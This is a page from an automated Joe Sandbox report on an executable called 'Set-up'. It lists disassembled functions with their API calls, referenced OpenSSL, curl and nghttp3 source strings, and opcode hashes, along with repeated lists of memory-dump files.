Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpy$__acrt_iob_func_errnofflushstrlen
String ID: vtls/vtls.c
API String ID: 1294796744-169717415
Opcode ID: d53b75b67edd3983a1852f718a86491cb5e5e84003eed9306470bc0289d1a16d
Instruction ID: 292a7acf59d0797df19929342db07a271e10777d6db2d7637eaa838edec1a3d7
Opcode Fuzzy Hash: d53b75b67edd3983a1852f718a86491cb5e5e84003eed9306470bc0289d1a16d
Instruction Fuzzy Hash: EAA153B0B00702ABDB608F69EC46B26BBE4FF54744F044539E948DB682F771E894CB55

Function 0098E720 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 207COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000), ref: 0098E9A3

Strings

crypto/bn/bn_shift.c, xrefs: 0098E7E9
, xrefs: 0098E992
BN_lshift, xrefs: 0098E7E2

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memset
String ID: $BN_lshift$crypto/bn/bn_shift.c
API String ID: 2221118986-2228461501
Opcode ID: 18bb63a7ce366d6f369567564721ee4608a40b82176a64bcaf4184aeab1a49f9
Instruction ID: 7cddf4ea74b9d8ed59773e19c2c55a8972480c2e440be5fd6d1bbca44c1f2429
Opcode Fuzzy Hash: 18bb63a7ce366d6f369567564721ee4608a40b82176a64bcaf4184aeab1a49f9
Instruction Fuzzy Hash: 9F710E35A083159BC714EF29C89062AF7E5AFDA710F048B2EFDA967391D771AC01CB81

Function 00A04870 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 179stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,009B05BF,00000000,00000000,input), ref: 00A04986
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,?), ref: 00A049D4

Strings

ossl_property_string, xrefs: 00A0491C, 00A0494F
crypto/property/property_string.c, xrefs: 00A04926, 00A04959, 00A0499A, 00A049F3, 00A04A4D, 00A04A72

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpystrlen
String ID: crypto/property/property_string.c$ossl_property_string
API String ID: 3412268980-3682758481
Opcode ID: 9e320179c6de06c1bcb5db7186326a8e30aca451e93652bf5a33bfd2aa5d7ba5
Instruction ID: ed7803bc1d2db9412546b0c4a56bc667f6b3241c5d2a10964b2987ba5ea8f10e
Opcode Fuzzy Hash: 9e320179c6de06c1bcb5db7186326a8e30aca451e93652bf5a33bfd2aa5d7ba5
Instruction Fuzzy Hash: DC5107F6A442057BE7117BA4BD43F5BB6986F94344F044134FE48A6393FA61EE14C392

Function 009F6590 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 009F662C

Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8

Strings

ocsp_match_issuerid, xrefs: 009F66A9, 009F66E3, 009F675D
crypto/ocsp/ocsp_vfy.c, xrefs: 009F66B3, 009F66ED, 009F6767

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcmp
String ID: crypto/ocsp/ocsp_vfy.c$ocsp_match_issuerid
API String ID: 1653033214-3047229099
Opcode ID: 3827b7a3f2305b593f3c65b0ac24b9d68b8546311376d6259eda8ca416344dfd
Instruction ID: 2906bc6f746e4fdcd9654f96bcc4de53dd7e3dbe77dda1fe6b7ff25bc550eedf
Opcode Fuzzy Hash: 3827b7a3f2305b593f3c65b0ac24b9d68b8546311376d6259eda8ca416344dfd
Instruction Fuzzy Hash: EF4107A6A483097BE62036B02D87FBF314C4F91758F240A34FB19992C3F955DA1483A7

Function 008C8710 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 008C8769
SleepConditionVariableCS.KERNEL32(?,?,000000FF), ref: 008C87D1

Part of subcall function 008C88B0: QueryPerformanceFrequency.KERNEL32(?), ref: 008C88C1
Part of subcall function 008C88B0: QueryPerformanceCounter.KERNEL32(?), ref: 008C88CC

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: PerformanceQuery$ConditionCounterCriticalEnterFrequencySectionSleepVariable
String ID:
API String ID: 3112449238-0
Opcode ID: e1ad28ce58672a07d5df9485f6ae465214bf6b1afd566165932bf024c5e7566e
Instruction ID: d21eb92bba6bed4af5f41f65eb1d72d1e6494fffbb6c712a2228d65412086df1
Opcode Fuzzy Hash: e1ad28ce58672a07d5df9485f6ae465214bf6b1afd566165932bf024c5e7566e
Instruction Fuzzy Hash: AE31E3B2B40216EFEB089A25DC85F6A7678FB90340F54453CF816D7691EF31ED1487A1

Function 009B60E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(009B7CCC,?,00000000,009B7127,009B7CCC,00000000,009DCAB7,00801A70), ref: 009B60E3
SetLastError.KERNEL32(00000000), ref: 009B61A5

Strings

crypto/err/err.c, xrefs: 009B6275
crypto/err/err_local.h, xrefs: 009B620C, 009B6227, 009B6257

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: ErrorLast
String ID: crypto/err/err.c$crypto/err/err_local.h
API String ID: 1452528299-2963546075
Opcode ID: d13886d4bfbc5d367520c08fdc9b37b257474fe55486f7fc8ce7c44a69891933
Instruction ID: bff622c4d7eaa25b0431f55649bc0c1b4c922c15f1b7f68172551eb5f49cd61e
Opcode Fuzzy Hash: d13886d4bfbc5d367520c08fdc9b37b257474fe55486f7fc8ce7c44a69891933
Instruction Fuzzy Hash: 5B3109B56843027AFA211E2C7D4BBA57714BBC572DF044230FE24A82D7E7B9B828C591

Function 009909A0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008,?,00000008,?,?,?,?,?,?,?,00A2066D,?,?,?), ref: 00990AAD

Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8

Strings

crypto/buffer/buffer.c, xrefs: 009909D2, 00990A31, 00990A47, 00990A7F
BUF_MEM_grow_clean, xrefs: 009909CB

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memset
String ID: BUF_MEM_grow_clean$crypto/buffer/buffer.c
API String ID: 2970985887-4138242688
Opcode ID: 51ef9213bbb121cd9e2f2b1a5df02bb14de4e7bc77e6ea576d42a5d3d3d7458f
Instruction ID: 163e4419202f991e2927a1ceb7ee4324318b1ed980988021bf128e80e8650930
Opcode Fuzzy Hash: 51ef9213bbb121cd9e2f2b1a5df02bb14de4e7bc77e6ea576d42a5d3d3d7458f
Instruction Fuzzy Hash: 87313971B45300AFDF10AF28DC86B2A7B9C9FC1B14F088528F9599E2D6E7A4DC0487B1

Function 00974460 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,009771DD,00000000,?,?), ref: 009744AC
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?), ref: 009744FF

Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8

Strings

crypto/asn1/asn1_lib.c, xrefs: 00974487, 009744DB
ASN1_STRING_set, xrefs: 0097447D

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen$strcpy$memcpy
String ID: ASN1_STRING_set$crypto/asn1/asn1_lib.c
API String ID: 1223016426-1431402185
Opcode ID: 80f693e3cc125e925a9dccb85a8bf62cd53d3ccb82686dd678a9b5de2798e11f
Instruction ID: e8ead7da7e6603c2214482402a288c1c3405ca10439b47f26272745692bb79c9
Opcode Fuzzy Hash: 80f693e3cc125e925a9dccb85a8bf62cd53d3ccb82686dd678a9b5de2798e11f
Instruction Fuzzy Hash: AB1108736442145BD7206E649C42B67B3DC9BD1724F158169FD1D9B2D3EB61DC00D2F2

Function 008AC220 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 245COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - pbuf->last) == len,nghttp3_qpack.c,00000978), ref: 008AC4E7

Strings

(size_t)(p - pbuf->last) == len, xrefs: 008AC4E2
nghttp3_qpack.c, xrefs: 008AC4DD

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - pbuf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-3384106985
Opcode ID: 1edbe931464641b84d7dd0918458d102f206e2603b6822f759fda0c690a20dae
Instruction ID: c42bdb3fbb66615e916583ec274620083c6ee29d02b0b094d9e1d005b4738b0c
Opcode Fuzzy Hash: 1edbe931464641b84d7dd0918458d102f206e2603b6822f759fda0c690a20dae
Instruction Fuzzy Hash: 8681E571A093049FE7049E2CC89072AB7D2FB9A714F18867CF999CB7D2D635DC488786

Function 0098C950 Relevance: 5.4, APIs: 4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3814d95afad6b936a2d5c551bd923942d76a2c6af3998982bb9c18806d57476
Instruction ID: db593f051f2586f932aaf1b199f73767b075bedecdf1e9caa5763facf168f89f
Opcode Fuzzy Hash: f3814d95afad6b936a2d5c551bd923942d76a2c6af3998982bb9c18806d57476
Instruction Fuzzy Hash: B5D18CB2508305BFD700AF58DC81E6BBBA9EBC5354F49492CF98553362E631ED14CBA2

Function 008AC520 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - rbuf->last) == len,nghttp3_qpack.c,000004D0,?,?,?,?,?,?,008AB434,?,?,00000000,00000000,?,?), ref: 008AC68A

Strings

(size_t)(p - rbuf->last) == len, xrefs: 008AC685
nghttp3_qpack.c, xrefs: 008AC680

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - rbuf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-2159148421
Opcode ID: 030a871c1df3a3752ab8ea266578e292c3f8869fc20d0422c09b37909dfeb443
Instruction ID: 0f691d5242c0d3f9c94c21381da71c0e5b1f29a74db72c1bad1657f2c0db5298
Opcode Fuzzy Hash: 030a871c1df3a3752ab8ea266578e292c3f8869fc20d0422c09b37909dfeb443
Instruction Fuzzy Hash: CE411671B082045FE7099A28D85076AB7D2FFDA314F18C67CE889CB792E935DD058792

Function 008B2600 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len,nghttp3_qpack.c,00000EB7,?,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 008B27D1

Strings

nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len, xrefs: 008B27CC
nghttp3_qpack.c, xrefs: 008B27C7

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

